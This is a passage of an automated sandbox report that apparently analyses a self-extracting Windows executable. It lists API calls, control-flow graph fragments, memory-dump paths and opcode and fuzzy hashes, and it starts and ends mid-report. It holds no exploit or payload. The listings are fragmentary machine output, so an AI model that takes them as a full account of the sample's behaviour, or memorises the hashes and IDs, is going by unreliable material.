                                                                                                        • Part of subcall function 009FFDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,009FA5A0,?,?,?,?,00A1F79B,000000FF), ref: 009FFDFD
                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 009FFA05
                                                                                                      • CloseHandle.KERNEL32(?,?), ref: 009FFA1F
                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 009FFA38
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 009FFA44
                                                                                                      • CloseHandle.KERNEL32(?), ref: 009FFA50
                                                                                                        • Part of subcall function 009FFAC7: WaitForSingleObject.KERNEL32(?,000000FF,009FFD0B,?,?,009FFD80,?,?,?,?,?,009FFD6A), ref: 009FFACD
                                                                                                        • Part of subcall function 009FFAC7: GetLastError.KERNEL32(?,?,009FFD80,?,?,?,?,?,009FFD6A), ref: 009FFAD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 1868215902-0
                                                                                                      • Opcode ID: 5dc1b1e3785213f6198a2198d3164fb6c1fc0e5e3470218826081052185356cd
                                                                                                      • Instruction ID: 85e5c358d6ea0bae67b94dd48aa762a8f96345098243e7ccc911211dfe98ec32
                                                                                                      • Opcode Fuzzy Hash: 5dc1b1e3785213f6198a2198d3164fb6c1fc0e5e3470218826081052185356cd
                                                                                                      • Instruction Fuzzy Hash: 38019E32004748EFD731DB68DD94FA6BBAAFF45710F004539F29E92561CB71A802CB21

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 896 a08fc8-a08fe7 GetClassNameW 897 a08fe9-a08ffe call a00b12 896->897 898 a0900f-a09011 896->898 903 a09000-a0900c FindWindowExW 897->903 904 a0900e 897->904 900 a09013-a09016 SHAutoComplete 898->900 901 a0901c-a09020 898->901 900->901 903->904 904->898
                                                                                                      APIs
                                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00A08FDF
                                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A09016
                                                                                                        • Part of subcall function 00A00B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009FAC49,?,?,?,009FABF8,?,-00000002,?,00000000,?), ref: 00A00B28
                                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A09006
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                      • String ID: EDIT
                                                                                                      • API String ID: 4243998846-3080729518
                                                                                                      • Opcode ID: 4218b2519b3016d955e0731527ff7c5144527bc9582b433f715d4ed787e4a570
                                                                                                      • Instruction ID: d56138aacf97cdb361e6133ab54384fe1256c5a962ff9005f231f541ea0b1216
                                                                                                      • Opcode Fuzzy Hash: 4218b2519b3016d955e0731527ff7c5144527bc9582b433f715d4ed787e4a570
                                                                                                      • Instruction Fuzzy Hash: E5F08232A0122C67EB309B69AD05FEB766CAF9AB51F440075BA01F61C1D7609903C6E6

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 905 a0be0a-a0be35 call a0cec0 SetEnvironmentVariableW call 9fef07 909 a0be3a-a0be3e 905->909 910 a0be40-a0be44 909->910 911 a0be62-a0be66 909->911 912 a0be4d-a0be54 call 9feffe 910->912 915 a0be46-a0be4c 912->915 916 a0be56-a0be5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                                      APIs
                                                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A0BE20
                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0BE5C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentVariable
                                                                                                      • String ID: sfxcmd$sfxpar
                                                                                                      • API String ID: 1431749950-3493335439
                                                                                                      • Opcode ID: af8113d7e18847d913facb57e0780f2d84d36af588196e4fc129d8246acfa485
                                                                                                      • Instruction ID: 643fd7654d3094ec58a6e562c5b843f11956a749c575248f66bf0d6134b4a838
                                                                                                      • Opcode Fuzzy Hash: af8113d7e18847d913facb57e0780f2d84d36af588196e4fc129d8246acfa485
                                                                                                      • Instruction Fuzzy Hash: 08F0A772811238BAC7216FD4EC49EF67B99AF14B51B000161FE8896192D7644C51C7B0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 917 9f973d-9f975e call a0cec0 920 9f9767 917->920 921 9f9760-9f9765 917->921 922 9f9769-9f9786 920->922 921->920 921->922 923 9f978e-9f9798 922->923 924 9f9788 922->924 925 9f979d-9f97c8 CreateFileW 923->925 926 9f979a 923->926 924->923 927 9f982c-9f9841 925->927 928 9f97ca-9f97ec GetLastError call 9fb275 925->928 926->925 929 9f985b-9f9866 927->929 930 9f9843-9f9856 call 9ff10e 927->930 934 9f97ee-9f9810 CreateFileW GetLastError 928->934 935 9f981b-9f9820 928->935 930->929 936 9f9816-9f9819 934->936 937 9f9812 934->937 935->927 938 9f9822 935->938 936->927 936->935 937->936 938->927
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,009F777A,?,00000005,?,00000011), ref: 009F97BD
                                                                                                      • GetLastError.KERNEL32(?,?,009F777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F97CA
                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,009F777A,?,00000005,?), ref: 009F97FF
                                                                                                      • GetLastError.KERNEL32(?,?,009F777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9807
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1214770103-0
                                                                                                      • Opcode ID: ec2f1f6b1df9484ef8d31728dc438e1b7be1120213f3ca90e13f29ac44f17b0b
                                                                                                      • Instruction ID: 20784f17cdda4a8679c3983acf43adaaae5c3f39f08e49b9445c4907aebcb2c0
                                                                                                      • Opcode Fuzzy Hash: ec2f1f6b1df9484ef8d31728dc438e1b7be1120213f3ca90e13f29ac44f17b0b
                                                                                                      • Instruction Fuzzy Hash: B03152718443496FE3209F68CC05FFABBA8FB45364F104729FAA0872D1D3759889CB90
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 009F9623
                                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 009F963B
                                                                                                      • GetLastError.KERNEL32 ref: 009F966D
                                                                                                      • GetLastError.KERNEL32 ref: 009F968C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2244327787-0
                                                                                                      • Opcode ID: bce90fc2b1257fafe6dfc3ad770fede52bc6fb8921a89d0546640a7ed1af66f8
                                                                                                      • Instruction ID: aacd2030226654907a58c7aa83ba75fa0c178a5f2e9b15d4fb72a835143f137a
                                                                                                      • Opcode Fuzzy Hash: bce90fc2b1257fafe6dfc3ad770fede52bc6fb8921a89d0546640a7ed1af66f8
                                                                                                      • Instruction Fuzzy Hash: 4411273050420CABDF309B699904F7A77ADEB05325F10852AEA6AC5290CB3A9D419F52
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A12213,00000000,00000000,?,00A17778,00A12213,00000000,00000000,00000000,?,00A17975,00000006,FlsSetValue), ref: 00A17803
                                                                                                      • GetLastError.KERNEL32(?,00A17778,00A12213,00000000,00000000,00000000,?,00A17975,00000006,FlsSetValue,00A23768,00A23770,00000000,00000364,?,00A163F1), ref: 00A1780F
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A17778,00A12213,00000000,00000000,00000000,?,00A17975,00000006,FlsSetValue,00A23768,00A23770,00000000), ref: 00A1781D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3177248105-0
                                                                                                      • Opcode ID: 1b1c35c9a19b3e12910931baa58a58d4a67f59c510fc70e20cbd9797bb8f5e28
                                                                                                      • Instruction ID: e7def3088438e5a49c7409bfa36d1197664cbb867c46df9035438f9e4a6ced30
                                                                                                      • Opcode Fuzzy Hash: 1b1c35c9a19b3e12910931baa58a58d4a67f59c510fc70e20cbd9797bb8f5e28
                                                                                                      • Instruction Fuzzy Hash: C00184366192329BC7718BBD9C48FAE7BB9AF457A1B201630F907D7541D720D982C6E0
                                                                                                      APIs
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0992F
                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A09940
                                                                                                      • TranslateMessage.USER32(?), ref: 00A0994A
                                                                                                      • DispatchMessageW.USER32(?), ref: 00A09954
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4217535847-0
                                                                                                      • Opcode ID: 8d2bc00de115264942804b0d803213e7e986812bf641016957900eac047ef15d
                                                                                                      • Instruction ID: d6ae8206c8683e750464e331a951e1bd3fad9e342d0296f2c4530fbc03137a80
                                                                                                      • Opcode Fuzzy Hash: 8d2bc00de115264942804b0d803213e7e986812bf641016957900eac047ef15d
                                                                                                      • Instruction Fuzzy Hash: 54E0ED72D0212EA78B30EBEAAC4CCEB7F6CEF163A57004125B519D2410D6689507C7F1
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 009FFBD5
                                                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 009FFC1C
                                                                                                        • Part of subcall function 009F6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6DF1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                      • String ID: CreateThread failed
                                                                                                      • API String ID: 2655393344-3849766595
                                                                                                      • Opcode ID: 132c9ce8f8ad8645d7d74a34e07319b1049473a5820ef0f060a701936a4add64
                                                                                                      • Instruction ID: d74b975170a30a45c57a699055630e6e938219dae4dfc1539965c3e7a4314421
                                                                                                      • Opcode Fuzzy Hash: 132c9ce8f8ad8645d7d74a34e07319b1049473a5820ef0f060a701936a4add64
                                                                                                      • Instruction Fuzzy Hash: 8901627234831D6BE624ABA8AC52F767799EF84725F20043DFA8296181CAA168428720
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,009FC853,00000001,?,?,?,00000000,00A0420B,?,?,?,?,?,00A03CB0), ref: 009F9BE3
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,00A03EB8,00000000,?,?,00000000,00A0420B,?,?,?,?,?,00A03CB0,?), ref: 009F9C23
                                                                                                      • WriteFile.KERNELBASE(?,00000000,?,00A03EB8,00000000,?,00000001,?,?,009FC853,00000001,?,?,?,00000000,00A0420B), ref: 009F9C50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$Handle
                                                                                                      • String ID:
                                                                                                      • API String ID: 4209713984-0
                                                                                                      • Opcode ID: eebadea209df2e272a566d1e6b34fbca4be6f000872afc735fb275e3b4f6dd80
                                                                                                      • Instruction ID: 1bcefef9d8945bae6d6ad596ce06357c0886b0f64f91bcbf12e5788f3f091444
                                                                                                      • Opcode Fuzzy Hash: eebadea209df2e272a566d1e6b34fbca4be6f000872afc735fb275e3b4f6dd80
                                                                                                      • Instruction Fuzzy Hash: C631037110860EAFEB209F18D848FB6BBACEB50711F004519F699931D0C775A849CBA1
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009F9EAD
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009F9EE0
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009F9EFD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2485089472-0
                                                                                                      • Opcode ID: 16084ec22d8cb948f8b2c6546d48628365f182d648eac0071ddf6ed9aa12d26a
                                                                                                      • Instruction ID: cc7e305fb0541cc7fcfa29a02fa7a41830c66d74806c9c3b3c3ff42e7fb56405
                                                                                                      • Opcode Fuzzy Hash: 16084ec22d8cb948f8b2c6546d48628365f182d648eac0071ddf6ed9aa12d26a
                                                                                                      • Instruction Fuzzy Hash: F801F13211011C66EB31EBA88C85FFE334C9F06389F080812FB05D2491DB248DC297E2
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID: CMT
                                                                                                      • API String ID: 3519838083-2756464174
                                                                                                      • Opcode ID: eba24eaeab0b7af56c096a5a70b8937e91ef723a9f41507f9e60175f94ab5d00
                                                                                                      • Instruction ID: 69078d8204fd0981e054d3ec148882744eb44dbeeff7e4fa36139ca5e1722ef4
                                                                                                      • Opcode Fuzzy Hash: eba24eaeab0b7af56c096a5a70b8937e91ef723a9f41507f9e60175f94ab5d00
                                                                                                      • Instruction Fuzzy Hash: F061A271504F48AEDB25DB34CC51AF7B7E8AF54301F44896EE69B87182DA356A48CF10
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A182E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                      • Opcode ID: d2df362e516db55a1933e43e8978c42e2cef28473e04ffbd29b86f540a665145
                                                                                                      • Instruction ID: 41c843f1290d086c52ddd14e20f670f7e9cd7d68faa9226c2c5608077b47400c
                                                                                                      • Opcode Fuzzy Hash: d2df362e516db55a1933e43e8978c42e2cef28473e04ffbd29b86f540a665145
                                                                                                      • Instruction Fuzzy Hash: B0412B7050424C9EDB228F588C84AFABBBEDB45704F5804ECE59A9A142DA39A985DF60
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F1DA6
                                                                                                        • Part of subcall function 009F3AA3: __EH_prolog.LIBCMT ref: 009F3AA8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID: CMT
                                                                                                      • API String ID: 3519838083-2756464174
                                                                                                      • Opcode ID: ab67b7a0328fb19733ce1c77c0318d02e8313113aa9f254067807f200c16f98f
                                                                                                      • Instruction ID: 5feb525ac71a93ce156f3ff108ffc717f9a9a1c019d618b716ea96935d3b1a2d
                                                                                                      • Opcode Fuzzy Hash: ab67b7a0328fb19733ce1c77c0318d02e8313113aa9f254067807f200c16f98f
                                                                                                      • Instruction Fuzzy Hash: 75211776904209DFCB15EF98DA41AEEFBF6AF58300F200469E945A7261CB365A50DBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID: CMT
                                                                                                      • API String ID: 3519838083-2756464174
                                                                                                      • Opcode ID: 21e28977580c6461709a3b097de53423b755f1feeb161545262020aca8975865
                                                                                                      • Instruction ID: 7bbe0fdfe3f82e77c0ebb7fab9dc058b1cdca0e9f811605378cc97456248114d
                                                                                                      • Opcode Fuzzy Hash: 21e28977580c6461709a3b097de53423b755f1feeb161545262020aca8975865
                                                                                                      • Instruction Fuzzy Hash: 8711D671A00209EFDB04DF65D495ABEF7BEBF85300F48441AE50597342DB759991CBD0
                                                                                                      APIs
                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00A17A7A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String
                                                                                                      • String ID: LCMapStringEx
                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                      • Opcode ID: fb86ed7fa56956634c4f8f6c8e983ee4b42a841e1f9390439773f77019df2937
                                                                                                      • Instruction ID: effffce97378c1c0ce730431adde59c820fb76c57d60b802288d9d5584ce6d59
